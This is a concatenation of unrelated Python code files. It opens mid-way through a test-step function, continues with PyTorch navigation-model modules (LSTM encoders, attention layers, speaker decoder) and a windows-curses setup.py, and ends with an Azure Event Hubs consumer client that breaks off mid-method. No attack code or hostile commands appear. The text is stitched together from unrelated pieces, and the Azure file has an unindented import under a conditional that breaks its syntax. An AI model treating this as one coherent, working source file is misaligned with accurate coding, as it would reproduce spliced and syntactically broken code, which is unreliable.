            _step_obj.context.type = type_name
            _step_obj.context.name = name
            _step_obj.context.stash = recursive_jsonify(data_list)
            _step_obj.context.cumulative_stash.extend(_step_obj.context.stash)
            _step_obj.context.addresses = name
            _step_obj.context.address = name
            _step_obj.context.property_name = type_name
            return True

    # Nothing matched: skip this step and the rest of the scenario.
    skip_step(_step_obj, name)
|
import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.nn.functional as F
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
from param import args
class ObjEncoder(nn.Module):
    '''Embeds object-label indices with a frozen GloVe lookup table.'''

    def __init__(self, vocab_size, embedding_size, glove_matrix):
        super(ObjEncoder, self).__init__()
        # Index 100 is reserved as the padding label.
        pad = 100
        self.embedding = nn.Embedding(vocab_size, embedding_size, pad)
        # Load the pre-trained vectors and freeze them (no fine-tuning).
        self.embedding.weight.data[...] = torch.from_numpy(glove_matrix)
        self.embedding.weight.requires_grad = False

    def forward(self, inputs):
        '''Map label indices to their (frozen) GloVe vectors.'''
        return self.embedding(inputs)
class EncoderLSTM(nn.Module):
    ''' Encodes navigation instructions, returning hidden state context (for
        attention methods) and a decoder initial state. '''

    def __init__(self, vocab_size, embedding_size, hidden_size, padding_idx,
                            dropout_ratio, bidirectional=False, num_layers=1, glove=None):
        # :param glove: optional numpy matrix; when given, the embedding
        #   table is initialised from it and frozen.
        super(EncoderLSTM, self).__init__()
        self.embedding_size = embedding_size
        self.hidden_size = hidden_size
        self.drop = nn.Dropout(p=dropout_ratio)
        if bidirectional:
            print("Using Bidir in EncoderLSTM")
        self.num_directions = 2 if bidirectional else 1
        self.num_layers = num_layers
        self.embedding = nn.Embedding(vocab_size, embedding_size, padding_idx)
        if glove is not None:
            print('Using glove word embedding')
            self.embedding.weight.data[...] = torch.from_numpy(glove)
            self.embedding.weight.requires_grad = False  # keep GloVe fixed
        input_size = embedding_size
        self.lstm = nn.LSTM(input_size, hidden_size, self.num_layers,
                            batch_first=True, dropout=dropout_ratio,
                            bidirectional=bidirectional)
        # Projects the encoder summary to the decoder's initial hidden state.
        self.encoder2decoder = nn.Linear(hidden_size * self.num_directions,
            hidden_size * self.num_directions
        )

    def init_state(self, inputs):
        ''' Initialize to zero cell states and hidden states.

        NOTE: moves the states to CUDA unconditionally — requires a GPU.
        '''
        batch_size = inputs.size(0)
        h0 = Variable(torch.zeros(
            self.num_layers * self.num_directions,
            batch_size,
            self.hidden_size
        ), requires_grad=False)
        c0 = Variable(torch.zeros(
            self.num_layers * self.num_directions,
            batch_size,
            self.hidden_size
        ), requires_grad=False)

        return h0.cuda(), c0.cuda()

    def forward(self, inputs, lengths):
        ''' Expects input vocab indices as (batch, seq_len). Also requires a
            list of lengths for dynamic batching.

        Returns (ctx, decoder_init, c_t); see trailing shape comments.
        '''
        embeds = self.embedding(inputs)   # (batch, seq_len, embedding_size)
        embeds = self.drop(embeds)
        h0, c0 = self.init_state(inputs)
        # NOTE(review): pack_padded_sequence without enforce_sorted=False —
        # assumes `lengths` is already sorted descending; confirm at callers.
        packed_embeds = pack_padded_sequence(embeds, lengths, batch_first=True)
        enc_h, (enc_h_t, enc_c_t) = self.lstm(packed_embeds, (h0, c0))

        if self.num_directions == 2:    # The size of enc_h_t is (num_layers * num_directions, batch, hidden_size)
            # Concatenate the last layer's backward ([-1]) and forward ([-2])
            # final states; the order here must match training.
            h_t = torch.cat((enc_h_t[-1], enc_h_t[-2]), 1)
            c_t = torch.cat((enc_c_t[-1], enc_c_t[-2]), 1)
        else:
            h_t = enc_h_t[-1]
            c_t = enc_c_t[-1] # (batch, hidden_size)

        ctx, _ = pad_packed_sequence(enc_h, batch_first=True)

        # Decoder init is selected by the global config: max-pooled context
        # vs. the final hidden state, both passed through a Tanh projection.
        if args.sub_out == "max":
            ctx_max, _ = ctx.max(1)
            decoder_init = nn.Tanh()(self.encoder2decoder(ctx_max))
        elif args.sub_out == "tanh":
            decoder_init = nn.Tanh()(self.encoder2decoder(h_t))
        else:
            assert False

        ctx = self.drop(ctx)
        if args.zero_init:
            # Ablation: start the decoder from all-zero states.
            return ctx, torch.zeros_like(decoder_init), torch.zeros_like(c_t)
        else:
            return ctx, decoder_init, c_t  # (batch, seq_len, hidden_size*num_directions)
                                           # (batch, hidden_size)
class SoftDotAttention(nn.Module):
    '''Soft Dot Attention.

    Ref: http://www.aclweb.org/anthology/D15-1166
    Adapted from PyTorch OPEN NMT.
    '''

    def __init__(self, query_dim, ctx_dim):
        '''Initialize layer.

        :param query_dim: dimensionality of the query vector h
        :param ctx_dim: dimensionality of each context vector
        '''
        super(SoftDotAttention, self).__init__()
        self.linear_in = nn.Linear(query_dim, ctx_dim, bias=False)
        # dim=1 made explicit: the input is (batch, seq_len), for which the
        # legacy implicit-dim nn.Softmax() chose dim=1 anyway — identical
        # behavior, without the deprecation warning.
        self.sm = nn.Softmax(dim=1)
        self.linear_out = nn.Linear(query_dim + ctx_dim, query_dim, bias=False)
        self.tanh = nn.Tanh()

    def forward(self, h, context, mask=None,
                output_tilde=True, output_prob=True):
        '''Propagate h through the network.

        h: batch x dim
        context: batch x seq_len x dim
        mask: batch x seq_len indices to be masked
        output_tilde: if True, also return tanh(W[weighted_ctx; h])
        output_prob: if False, `attn` is returned as raw (pre-softmax) logits
        '''
        target = self.linear_in(h).unsqueeze(2)  # batch x dim x 1

        # Get attention scores
        attn = torch.bmm(context, target).squeeze(2)  # batch x seq_len
        # NOTE: `logit` is an ALIAS of `attn`, not a copy — the in-place
        # masked_fill_ below mutates it too, so with a mask and
        # output_prob=False the returned logits contain -inf at masked
        # positions (kept as-is: downstream relies on current behavior).
        logit = attn

        if mask is not None:
            # -Inf masking prior to the softmax
            attn.masked_fill_(mask, -float('inf'))
        attn = self.sm(attn)
        attn3 = attn.view(attn.size(0), 1, attn.size(1))  # batch x 1 x seq_len

        weighted_context = torch.bmm(attn3, context).squeeze(1)  # batch x dim
        if not output_prob:
            attn = logit
        if output_tilde:
            h_tilde = torch.cat((weighted_context, h), 1)
            h_tilde = self.tanh(self.linear_out(h_tilde))
            return h_tilde, weighted_context, attn
        else:
            return weighted_context, attn
class ScaledSoftDotAttention(nn.Module):
    '''Scaled dot-product attention with learned projections.

    Queries, keys and values are each linearly projected to ``output_dim``
    (values additionally pass through a Tanh); scores are scaled by
    1/sqrt(output_dim) and soft-maxed over the last axis to pool the values.
    '''

    def __init__(self, q_dim, k_dim, v_dim, output_dim):
        super(ScaledSoftDotAttention, self).__init__()
        self.scale = 1 / (output_dim**0.5)
        self.linear_q = nn.Linear(q_dim, output_dim, bias=False)
        self.linear_k = nn.Linear(k_dim, output_dim, bias=False)
        self.linear_v = nn.Sequential(nn.Linear(v_dim, output_dim), nn.Tanh())

    def forward(self, q_in, k_in, v_in, mask=None):
        '''
        q_in:  B x L x Dq
        k_in:  B x L x N x Dk
        v_in:  B x L x N x Dv
        mask:  B x L x N (True entries are suppressed)
        '''
        query = self.linear_q(q_in)
        key = self.linear_k(k_in)
        value = self.linear_v(v_in)
        # Scaled dot-product scores over the N candidates: B x L x N.
        scores = torch.matmul(key, query.unsqueeze(3)).squeeze(3) * self.scale
        if mask is not None:
            scores.masked_fill_(mask, -1e9)
        weights = F.softmax(scores, dim=-1)
        # Attention-weighted sum of the projected values: B x L x output_dim.
        pooled = torch.matmul(value.permute(0,1,3,2), weights.unsqueeze(3))
        return pooled.squeeze(3)
class ASODecoderLSTM(nn.Module):
    '''Action/Subject/Object decoder.

    One LSTMCell step per navigation step; three separate attentions over
    the instruction context (action / subject / object) are fused by
    learned weights to score each candidate direction.
    '''

    def __init__(self, action_embed_size, hidden_size, dropout_ratio):
        super(ASODecoderLSTM, self).__init__()
        self.action_embed_size = action_embed_size
        self.hidden_size = hidden_size
        # Angle features -> action embedding.
        self.action_embedding = nn.Sequential(nn.Linear(args.angle_feat_size, action_embed_size), nn.Tanh())
        self.drop = nn.Dropout(p=dropout_ratio)
        # Separate (usually stronger) dropout for environment features.
        self.drop_env = nn.Dropout(p=args.featdropout)
        self.feat_att_layer = SoftDotAttention(hidden_size, args.visual_feat_size+args.angle_feat_size)
        self.lstm = nn.LSTMCell(action_embed_size+args.visual_feat_size+args.angle_feat_size, hidden_size)
        # Three parallel attentions over the instruction context.
        self.action_att_layer = SoftDotAttention(hidden_size, hidden_size)
        self.subject_att_layer = SoftDotAttention(hidden_size, hidden_size)
        self.object_att_layer = SoftDotAttention(hidden_size, hidden_size)
        # Scalar gates that fuse the three candidate scores.
        self.fuse_a = nn.Linear(hidden_size, 1)
        self.fuse_s = nn.Linear(hidden_size, 1)
        self.fuse_o = nn.Linear(hidden_size, 1)
        self.value_action = nn.Sequential(nn.Linear(args.angle_feat_size, hidden_size), nn.Tanh())
        self.subject_att = ScaledSoftDotAttention(args.angle_feat_size, args.angle_feat_size, args.visual_feat_size, hidden_size)
        self.object_att = ScaledSoftDotAttention(hidden_size, args.glove_dim+args.angle_feat_size, args.glove_dim+args.angle_feat_size, hidden_size)
        #cand attention layer
        self.cand_att_a = SoftDotAttention(hidden_size, hidden_size)
        self.cand_att_s = SoftDotAttention(hidden_size, hidden_size)
        self.cand_att_o = SoftDotAttention(hidden_size, hidden_size)

    def forward(self, action, feature,
                cand_visual_feat, cand_angle_feat, cand_obj_feat,
                near_visual_mask, near_visual_feat, near_angle_feat,
                near_obj_mask, near_obj_feat, near_edge_feat,
                h_0, prev_h1, c_0,
                ctx, ctx_mask=None,
                already_dropfeat=False):
        # :param already_dropfeat: when True, env dropout was applied upstream.
        # :return: (h_1, c_1, logit, h_tilde) — new LSTM state, fused
        #   candidate scores, and the averaged attended state.
        action_embeds = self.action_embedding(action)
        action_embeds = self.drop(action_embeds)

        if not already_dropfeat:
            # Drop only the visual part; the trailing angle features stay intact.
            feature[..., :-args.angle_feat_size] = self.drop_env(feature[..., :-args.angle_feat_size])
            cand_visual_feat = self.drop_env(cand_visual_feat)
            near_visual_feat = self.drop_env(near_visual_feat)
            cand_obj_feat = self.drop_env(cand_obj_feat)
            near_obj_feat = self.drop_env(near_obj_feat)

        prev_h1_drop = self.drop(prev_h1)
        # Attend over the panoramic features before the recurrent step.
        attn_feat, _ = self.feat_att_layer(prev_h1_drop, feature, output_tilde=False)
        concat_input = torch.cat((action_embeds, attn_feat), dim=-1)
        h_1, c_1 = self.lstm(concat_input, (prev_h1, c_0))
        h_1_drop = self.drop(h_1)

        # Three views of the instruction: action / subject / object.
        h_a, u_a, _ = self.action_att_layer(h_1_drop, ctx, ctx_mask)
        h_s, u_s, _ = self.subject_att_layer(h_1_drop, ctx, ctx_mask)
        h_o, u_o, _ = self.object_att_layer(h_1_drop, ctx, ctx_mask)
        h_a_drop, u_a_drop = self.drop(h_a), self.drop(u_a)
        h_s_drop, u_s_drop = self.drop(h_s), self.drop(u_s)
        h_o_drop, u_o_drop = self.drop(h_o), self.drop(u_o)

        # Per-branch fusion weights derived from the attended text vectors.
        fusion_weight = torch.cat([self.fuse_a(u_a_drop), self.fuse_s(u_s_drop), self.fuse_o(u_o_drop)], dim=-1)
        fusion_weight = F.softmax(fusion_weight, dim=-1)

        B, L = near_visual_mask.shape[0], near_visual_mask.shape[1]
        #action
        v_action = self.value_action(cand_angle_feat)
        #subject
        v_subject = self.subject_att(cand_angle_feat, near_angle_feat, near_visual_feat, near_visual_mask)
        v_subject = self.drop(v_subject)
        #object
        # Pair each of the top-N objects with its edge feature, then flatten
        # the 4 neighbour views x N objects into one candidate axis.
        near_obj = torch.cat([near_obj_feat, near_edge_feat.unsqueeze(3).expand(-1,-1,-1,args.top_N_obj,-1)], dim=-1)
        near_obj = near_obj.view(B, L, 4*args.top_N_obj, -1)
        near_obj_mask = near_obj_mask.unsqueeze(3).expand(-1,-1,-1,args.top_N_obj).contiguous().view(B, L, 4*args.top_N_obj)
        v_object = self.object_att(u_o_drop.unsqueeze(1).expand(-1,L,-1), near_obj, near_obj, near_obj_mask)
        v_object = self.drop(v_object)

        # Raw per-branch candidate logits (pre-softmax).
        _, logit_a = self.cand_att_a(h_a_drop, v_action, output_tilde=False, output_prob=False)
        _, logit_s = self.cand_att_s(h_s_drop, v_subject, output_tilde=False, output_prob=False)
        _, logit_o = self.cand_att_o(h_o_drop, v_object, output_tilde=False, output_prob=False)
        # Fuse the three logit sets with the learned weights.
        logit = torch.cat([logit_a.unsqueeze(2), logit_s.unsqueeze(2), logit_o.unsqueeze(2)], dim=-1)
        logit = torch.matmul(logit, fusion_weight.unsqueeze(2)).squeeze(2)

        h_tilde = (h_a + h_s + h_o) / 3.

        return h_1, c_1, logit, h_tilde
class Critic(nn.Module):
    '''Value head for RL training: maps an RNN state to a scalar baseline.'''

    def __init__(self):
        super(Critic, self).__init__()
        layers = [
            nn.Linear(args.rnn_dim, args.rnn_dim),
            nn.ReLU(),
            nn.Dropout(args.dropout),
            nn.Linear(args.rnn_dim, 1),
        ]
        self.state2value = nn.Sequential(*layers)

    def forward(self, state):
        value = self.state2value(state)
        return value.squeeze()
class SpeakerEncoder(nn.Module):
    '''Encodes a trajectory into a context sequence for the speaker model.

    Pipeline: LSTM over the per-step action embeddings -> soft-dot attention
    over the per-step panoramic features -> a second ("post") LSTM.
    '''

    def __init__(self, feature_size, hidden_size, dropout_ratio, bidirectional):
        super().__init__()
        self.num_directions = 2 if bidirectional else 1
        self.hidden_size = hidden_size
        self.num_layers = 1
        self.feature_size = feature_size

        if bidirectional:
            print("BIDIR in speaker encoder!!")

        self.lstm = nn.LSTM(feature_size, self.hidden_size // self.num_directions, self.num_layers,
                            batch_first=True, dropout=dropout_ratio, bidirectional=bidirectional)
        self.drop = nn.Dropout(p=dropout_ratio)
        # Stronger dropout applied to visual features only (not angle part).
        self.drop3 = nn.Dropout(p=args.featdropout)
        self.attention_layer = SoftDotAttention(self.hidden_size, feature_size)

        self.post_lstm = nn.LSTM(self.hidden_size, self.hidden_size // self.num_directions, self.num_layers,
                                 batch_first=True, dropout=dropout_ratio, bidirectional=bidirectional)

    def forward(self, action_embeds, feature, lengths, already_dropfeat=False):
        """
        :param action_embeds: (batch_size, length, 2048 + 128). The feature of the view
            NOTE(review): this description and `feature`'s below appear
            swapped in the original — confirm against the caller.
        :param feature: (batch_size, length, 36, 2048 + 128). The action taken (with the image feature)
        :param lengths: Not used in it
        :param already_dropfeat: if True, env dropout was already applied
        :return: context with shape (batch_size, length, hidden_size)

        WARNING: mutates `action_embeds` and `feature` in place when
        `already_dropfeat` is False (dropout is written back into them).
        """
        x = action_embeds
        if not already_dropfeat:
            x[..., :-args.angle_feat_size] = self.drop3(x[..., :-args.angle_feat_size])            # Do not dropout the spatial features

        # LSTM on the action embed
        ctx, _ = self.lstm(x)
        ctx = self.drop(ctx)

        # Att and Handle with the shape
        batch_size, max_length, _ = ctx.size()
        if not already_dropfeat:
            feature[..., :-args.angle_feat_size] = self.drop3(feature[..., :-args.angle_feat_size])   # Dropout the image feature
        x, _, _ = self.attention_layer(                        # Attend to the feature map
            ctx.contiguous().view(-1, self.hidden_size),       # (batch, length, hidden) --> (batch x length, hidden)
            feature.view(batch_size * max_length, -1, self.feature_size),  # (batch, length, # of images, feature_size) --> (batch x length, # of images, feature_size)
        )
        x = x.view(batch_size, max_length, -1)
        x = self.drop(x)

        # Post LSTM layer
        x, _ = self.post_lstm(x)
        x = self.drop(x)

        return x
class SpeakerDecoder(nn.Module):
    """Word-by-word speaker decoder: embeds tokens, runs an LSTM, attends
    over the encoder context, and projects to vocabulary logits."""
    def __init__(self, vocab_size, embedding_size, padding_idx, hidden_size, dropout_ratio):
        super().__init__()
        self.hidden_size = hidden_size
        self.embedding = torch.nn.Embedding(vocab_size, embedding_size, padding_idx)
        self.lstm = nn.LSTM(embedding_size, hidden_size, batch_first=True)
        self.drop = nn.Dropout(dropout_ratio)
        self.attention_layer = SoftDotAttention(hidden_size, hidden_size)
        self.projection = nn.Linear(hidden_size, vocab_size)
        # Scalar baseline head (value estimate for RL variance reduction).
        self.baseline_projection = nn.Sequential(
            nn.Linear(hidden_size, 128),
            nn.ReLU(),
            nn.Dropout(dropout_ratio),
            nn.Linear(128, 1)
        )
    def forward(self, words, ctx, ctx_mask, h0, c0):
        """Decode one chunk of words against encoder context `ctx`.

        Returns (logit, h1, c1): per-token vocabulary logits and the final
        LSTM hidden/cell states.
        """
        token_vecs = self.drop(self.embedding(words))
        hidden_seq, (h1, c1) = self.lstm(token_vecs, (h0, c0))
        hidden_seq = self.drop(hidden_seq)
        # Flatten (batch, length) into one query axis for the attention call.
        n_queries = words.size(0) * words.size(1)
        # Each ctx row may serve several decoded rows (supports beam search).
        reps = n_queries // ctx.size(0)
        flat_ctx = ctx.unsqueeze(1).expand(-1, reps, -1, -1).contiguous().view(n_queries, -1, self.hidden_size)
        flat_mask = ctx_mask.unsqueeze(1).expand(-1, reps, -1).contiguous().view(n_queries, -1)
        attended, _, _ = self.attention_layer(
            hidden_seq.contiguous().view(n_queries, self.hidden_size),
            flat_ctx,
            mask=flat_mask
        )
        attended = attended.view(words.size(0), words.size(1), self.hidden_size)
        # Project the (dropped-out) attended states to vocabulary logits.
        logit = self.projection(self.drop(attended))
        return logit, h1, c1
import sys
from setuptools import setup, Extension

# Windows link-time dependencies: the PDCurses static library plus the
# Win32 system libraries it calls into.
libraries = ['pdcurses', 'user32', 'advapi32', 'gdi32', 'comdlg32', 'shell32']
# Feature macros consumed by CPython's _cursesmodule.c so it compiles
# against PDCurses instead of ncurses.
define_macros = [
    ('PDC_WIDE', None),
    ('HAVE_NCURSESW', None),
    ('HAVE_TERM_H', None),
    ('HAVE_CURSES_IS_TERM_RESIZED', None),
    ('HAVE_CURSES_RESIZE_TERM', None),
    ('HAVE_CURSES_TYPEAHEAD', None),
    ('HAVE_CURSES_HAS_KEY', None),
    ('HAVE_CURSES_FILTER', None),
    ('HAVE_CURSES_WCHGAT', None),
    ('HAVE_CURSES_USE_ENV', None),
    ('HAVE_CURSES_IMMEDOK', None),
    ('HAVE_CURSES_SYNCOK', None),
    # ('HAVE_CURSES_IS_PAD', None),
    ('WINDOW_HAS_FLAGS', None),
    ('NCURSES_MOUSE_VERSION', 2),
    ('_ISPAD', 0x10),
    ('is_term_resized', 'is_termresized'),
]

# Per-Python-version source directory, e.g. 'py37//' for Python 3.7
# (the sources differ across CPython versions).
srcdir = 'py%i%i//' % sys.version_info[:2]

include_dirs = ["PDCurses", "."]
library_dirs = ["PDCurses/wincon"]

LONG_DESCRIPTION = """
Adds support for the standard Python curses module on Windows. Based on
https://www.lfd.uci.edu/~gohlke/pythonlibs/#curses. Uses the PDCurses
curses implementation.
PDCurses is compiled with wide character support, meaning get_wch() is
available. UTF-8 is forced as the encoding.
Note that PDCurses requires an explicit curses.resize_term(0, 0) call after
receiving KEY_RESIZE to get behavior similar to the automatic SIGWINCH handling
in ncurses. ncurses reliably fails for resize_term(0, 0), so a compatibility
hack is to always call resize_term(0, 0) and ignore any curses.error
exceptions.
Maybe it would be better to detect KEY_RESIZE in _cursesmodule.c and call
resize_term(0, 0) there, for automatic compatibility...
"""[1:-1]

setup(
    name='windows-curses',
    version='1.1',
    description="Support for the standard curses module on Windows",
    long_description=LONG_DESCRIPTION,
    url='http://bugs.python.org/issue2889',
    license='PSF2',
    ext_modules=[
        Extension('_curses',
                  # term.h and terminfo.c was removed from PDCurses in commit
                  # 6b569295 ("Eliminated term.h, terminfo.c; moved mvcur() to
                  # move.c"). They provide functions that are called
                  # unconditionally by _cursesmodule.c, so we keep a copy of
                  # the last versions in this repo.
                  #
                  # See https://github.com/wmcbrine/PDCurses/issues/55.
                  sources=[srcdir + '_cursesmodule.c', 'terminfo.c'],
                  define_macros=define_macros,
                  include_dirs=include_dirs,
                  library_dirs=library_dirs,
                  libraries=libraries),
        Extension('_curses_panel',
                  sources=[srcdir + '_curses_panel.c'],
                  define_macros=define_macros,
                  include_dirs=include_dirs,
                  library_dirs=library_dirs,
                  libraries=libraries)
    ],
    classifiers = [
        'Development Status :: 4 - Beta',
        'Environment :: Console :: Curses',
        'Environment :: Win32 (MS Windows)',
        'License :: OSI Approved :: Python Software Foundation License',
        'Operating System :: Microsoft :: Windows',
        'Programming Language :: C',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
        'Programming Language :: Python :: Implementation :: CPython',
        'Topic :: Software Development',
        'Topic :: Software Development :: Libraries :: Python Modules',
    ]
)
|
<reponame>piyawath/azure-sdk-for-python<filename>sdk/eventhub/azure-eventhubs/azure/eventhub/_consumer_client.py
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import logging
from typing import Any, Union, Dict, Tuple, TYPE_CHECKING, Callable, List
from .common import EventHubSharedKeyCredential, EventHubSASTokenCredential, EventData
from .client import EventHubClient
from ._eventprocessor.event_processor import EventProcessor
from ._eventprocessor.partition_context import PartitionContext
if TYPE_CHECKING:
from azure.core.credentials import TokenCredential # type: ignore
log = logging.getLogger(__name__)
class EventHubConsumerClient(EventHubClient):
    """ The EventHubConsumerClient class defines a high level interface for
    receiving events from the Azure Event Hubs service.
    The main goal of `EventHubConsumerClient` is to receive events from all partitions of an EventHub with
    load balancing and checkpointing.
    When multiple `EventHubConsumerClient` instances work within one process, across multiple processes, or across
    multiple machines, and they use the same repository as the load balancing and checkpointing store, they will
    balance automatically.
    To enable the load balancing and / or checkpointing, partition_manager must be set when creating the
    `EventHubConsumerClient`.
    An `EventHubConsumerClient` can also receive from a specific partition when you call its method `receive()`
    and specify the partition_id.
    Load balancing won't work in single-partition mode. But users can still save checkpoints if the partition_manager
    is set.
    :param str host: The hostname of the Event Hub.
    :param str event_hub_path: The path of the specific Event Hub to connect the client to.
    :param credential: The credential object used for authentication which implements particular interface
     of getting tokens. It accepts :class:`EventHubSharedKeyCredential<azure.eventhub.EventHubSharedKeyCredential>`,
     :class:`EventHubSASTokenCredential<azure.eventhub.EventHubSASTokenCredential>`, or credential objects generated by
     the azure-identity library and objects that implement `get_token(self, *scopes)` method.
    :keyword bool logging_enable: Whether to output network trace logs to the logger. Default is `False`.
    :keyword float auth_timeout: The time in seconds to wait for a token to be authorized by the service.
     The default value is 60 seconds. If set to 0, no timeout will be enforced from the client.
    :keyword str user_agent: The user agent that needs to be appended to the built in user agent string.
    :keyword int retry_total: The total number of attempts to redo the failed operation when an error happened. Default
     value is 3.
    :keyword transport_type: The type of transport protocol that will be used for communicating with
     the Event Hubs service. Default is `TransportType.Amqp`.
    :paramtype transport_type: ~azure.eventhub.TransportType
    :keyword dict http_proxy: HTTP proxy settings. This must be a dictionary with the following
     keys: 'proxy_hostname' (str value) and 'proxy_port' (int value).
     Additionally the following keys may also be present: 'username', 'password'.
    :keyword partition_manager: stores the load balancing data and checkpoint data when receiving events
     if partition_manager is specified. If it's None, this `EventHubConsumerClient` instance will receive
     events without load balancing and checkpoint.
    :paramtype partition_manager: ~azure.eventhub.PartitionManager
    :keyword float load_balancing_interval: When load balancing kicks in, this is the interval in seconds
     between two load balancing. Default is 10.
    .. admonition:: Example:
        .. literalinclude:: ../samples/sync_samples/sample_code_eventhub.py
            :start-after: [START create_eventhub_consumer_client_sync]
            :end-before: [END create_eventhub_consumer_client_sync]
            :language: python
            :dedent: 4
            :caption: Create a new instance of the EventHubConsumerClient.
    """
    def __init__(self, host, event_hub_path, credential, **kwargs):
        # type:(str, str, Union[EventHubSharedKeyCredential, EventHubSASTokenCredential, TokenCredential], Any) -> None
        """Create an EventHubConsumerClient; see the class docstring for the keyword options."""
        receive_timeout = kwargs.get("receive_timeout", 3)
        if receive_timeout <= 0:
            raise ValueError("receive_timeout must be greater than 0.")
        kwargs['receive_timeout'] = receive_timeout
        self._partition_manager = kwargs.pop("partition_manager", None)
        self._load_balancing_interval = kwargs.pop("load_balancing_interval", 10)
        super(EventHubConsumerClient, self).__init__(
            host=host, event_hub_path=event_hub_path, credential=credential,
            network_tracing=kwargs.get("logging_enable"), **kwargs)
        # Registry of running processors, keyed by (consumer_group, partition_id);
        # "-1" is the key used for a receive() that spans all partitions.
        self._event_processors = dict()  # type: Dict[Tuple[str, str], EventProcessor]
        self._closed = False
    @classmethod
    def _stop_eventprocessor(cls, event_processor):
        # Stop a running EventProcessor and remove it from its owning
        # client's registry (under the client lock).
        # pylint: disable=protected-access
        eventhub_client = event_processor._eventhub_client
        consumer_group = event_processor._consumer_group_name
        partition_id = event_processor._partition_id
        with eventhub_client._lock:
            event_processor.stop()
            if partition_id and (consumer_group, partition_id) in eventhub_client._event_processors:
                del eventhub_client._event_processors[(consumer_group, partition_id)]
            elif (consumer_group, '-1') in eventhub_client._event_processors:
                # "-1" marks an all-partitions processor for this consumer group.
                del eventhub_client._event_processors[(consumer_group, "-1")]
    @classmethod
    def from_connection_string(cls, conn_str, **kwargs):
        # type: (str, Any) -> EventHubConsumerClient
        """
        Create an EventHubConsumerClient from a connection string.
        :param str conn_str: The connection string of an eventhub.
        :keyword str event_hub_path: The path of the specific Event Hub to connect the client to.
        :keyword bool network_tracing: Whether to output network trace logs to the logger. Default is `False`.
        :keyword dict[str,Any] http_proxy: HTTP proxy settings. This must be a dictionary with the following
         keys - 'proxy_hostname' (str value) and 'proxy_port' (int value).
         Additionally the following keys may also be present - 'username', 'password'.
        :keyword float auth_timeout: The time in seconds to wait for a token to be authorized by the service.
         The default value is 60 seconds. If set to 0, no timeout will be enforced from the client.
        :keyword str user_agent: The user agent that needs to be appended to the built in user agent string.
        :keyword int retry_total: The total number of attempts to redo the failed operation when an error happened.
         Default value is 3.
        :keyword transport_type: The type of transport protocol that will be used for communicating with
         the Event Hubs service. Default is `TransportType.Amqp`.
        :paramtype transport_type: ~azure.eventhub.TransportType
        :keyword partition_manager:
         stores the load balancing data and checkpoint data when receiving events
         if partition_manager is specified. If it's None, this EventHubConsumerClient instance will receive
         events without load balancing and checkpoint.
        :paramtype partition_manager: ~azure.eventhub.PartitionManager
        :keyword float load_balancing_interval:
         When load balancing kicks in, this is the interval in seconds between two load balancing. Default is 10.
        .. admonition:: Example:
            .. literalinclude:: ../samples/sync_samples/sample_code_eventhub.py
                :start-after: [START create_eventhub_consumer_client_from_conn_str_sync]
                :end-before: [END create_eventhub_consumer_client_from_conn_str_sync]
                :language: python
                :dedent: 4
                :caption: Create a new instance of the EventHubConsumerClient from connection string.
        """
        return super(EventHubConsumerClient, cls).from_connection_string(conn_str, **kwargs)
    def receive(self, on_events, consumer_group, **kwargs):
        # type: (Callable[[PartitionContext, List[EventData]], None], str, Any) -> None
        """Receive events from partition(s) optionally with load balancing and checkpointing.
        :param on_events: The callback function for handling received events. The callback takes two
         parameters: `partition_context` which contains partition context and `events` which are the received events.
         Please define the callback like `on_event(partition_context, events)`.
         For detailed partition context information, please refer to
         :class:`PartitionContext<azure.eventhub.PartitionContext>`.
        :type on_events: Callable[~azure.eventhub.PartitionContext, List[EventData]]
        :param consumer_group: Receive events from the event hub for this consumer group
        :type consumer_group: str
        :keyword str partition_id: Receive from this partition only if it's not None.
         Receive from all partition otherwise.
        :keyword int owner_level: The priority of the exclusive consumer. An exclusive
         consumer will be created if owner_level is set. Higher owner_level has higher exclusive priority.
        :keyword int prefetch: The number of events to prefetch from the service
         for processing. Default is 300.
        :keyword bool track_last_enqueued_event_properties: Indicates whether the consumer should request information
         on the last enqueued event on its associated partition, and track that information as events are received.
         When information about the partition's last enqueued event is being tracked, each event received from the
         Event Hubs service will carry metadata about the partition. This results in a small amount of additional
         network bandwidth consumption that is generally a favorable trade-off when considered against periodically
         making requests for partition properties using the Event Hub client.
         It is set to `False` by default.
        :keyword initial_event_position: Start receiving from this initial_event_position
         if there isn't checkpoint data for a partition. Use the checkpoint data if it is available. This can be
         a dict with partition id as the key and position as the value for individual partitions, or a single
         EventPosition instance for all partitions.
        :paramtype initial_event_position: ~azure.eventhub.EventPosition or dict[str,~azure.eventhub.EventPosition]
        :keyword on_error: The callback function which would be called when there is an error met during the receiving
         time. The callback takes two parameters: `partition_context` which contains partition information
         and `error` being the exception. Please define the callback like `on_error(partition_context, error)`.
        :paramtype on_error: Callable[[~azure.eventhub.PartitionContext, Exception]]
        :keyword on_partition_initialize: The callback function which will be called after a consumer for certain
         partition finishes initialization. The callback takes one parameter: `partition_context` which contains
         the partition information. Please define the callback like `on_partition_initialize(partition_context)`.
        :paramtype on_partition_initialize: Callable[[~azure.eventhub.PartitionContext]]
        :keyword on_partition_close: The callback function which will be called after a consumer for certain
         partition is closed. The callback takes two parameters: `partition_context` which contains partition
         information and `reason` for the close. Please define the callback like
         `on_partition_close(partition_context, reason)`.
         Please refer to :class:`CloseReason<azure.eventhub.CloseReason>` for different closing reason.
        :paramtype on_partition_close: Callable[[~azure.eventhub.PartitionContext, CloseReason]]
        :rtype: None
        .. admonition:: Example:
            .. literalinclude:: ../samples/sync_samples/sample_code_eventhub.py
                :start-after: [START eventhub_consumer_client_receive_sync]
                :end-before: [END eventhub_consumer_client_receive_sync]
                :language: python
                :dedent: 4
                :caption: Receive events from the EventHub.
        """
        partition_id = kwargs.get("partition_id")
        with self._lock:
            # Reject a receive() that would overlap an existing processor for
            # the same consumer group (all-partitions or same-partition).
            error = None
            if (consumer_group, '-1') in self._event_processors:
                error = ValueError("This consumer client is already receiving events from all partitions for"
                                   " consumer group {}. ".format(consumer_group))
            elif partition_id is None and any(x[0] == consumer_group for x in self._event_processors):
                error = ValueError("This consumer client is already receiving events for consumer group {}. "
                                   .format(consumer_group))
            elif (consumer_group, partition_id) in self._event_processors:
